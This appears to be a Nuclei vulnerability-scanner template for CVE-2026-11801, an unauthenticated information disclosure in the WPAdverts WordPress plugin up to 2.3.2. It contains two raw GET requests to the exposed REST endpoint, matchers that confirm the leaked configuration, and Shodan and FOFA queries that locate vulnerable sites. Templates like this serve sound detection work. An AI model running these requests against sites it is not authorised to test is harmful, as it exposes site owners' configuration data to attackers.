id: CVE-2026-11801 info: name: WPAdverts <= 2.3.2 - Information Disclosure author: 0x_Akoko severity: high description: | WPAdverts – Classifieds Plugin for WordPress <= 2.3.2 contains an authorization bypass caused by improper user authorization verification in classifieds-types REST endpoint, letting unauthenticated attackers retrieve internal site configuration data, exploit requires no authentication. impact: | Unauthenticated attackers can access internal site configuration data, potentially exposing sensitive information about the site setup. remediation: | Update to the latest version beyond 2.3.2. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/37bb8d68-dd87-437a-80e5-e99e93dc55b6 - https://nvd.nist.gov/vuln/detail/CVE-2026-11801 - https://plugins.trac.wordpress.org/changeset?reponame=&new=3635095%40wpadverts%2Ftrunk&old=3557928%40wpadverts%2Ftrunk classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-11801 epss-score: 0.00967 epss-percentile: 0.59759 cwe-id: CWE-862 metadata: verified: true max-request: 2 vendor: developer product: wpadverts framework: wordpress shodan-query: http.html:"wp-content/plugins/wpadverts" fofa-query: body="wp-content/plugins/wpadverts" tags: cve,cve2026,wpadverts,wp,wordpress,wp-plugin,exposure http: - raw: - | GET /wp-json/wpadverts/v1/classifieds-types HTTP/1.1 Host: {{Hostname}} - | GET /?rest_route=/wpadverts/v1/classifieds-types HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "json")' - 'contains_all(body, "\"form_schemes_default\"", "\"meta__adverts_email\"", "\"post_type\"", "\"data\"")' condition: and # digest: 4b0a00483046022100db80970937ea6d87a1443dcb834a363c1199854212783731f85ea0087ab05596022100ac0911ef1deacfba7c27226ad88cd2c885c77fcc8e1fc37a0b9ee33c30bf939b:922c64590222798bb761d5b6d8e72950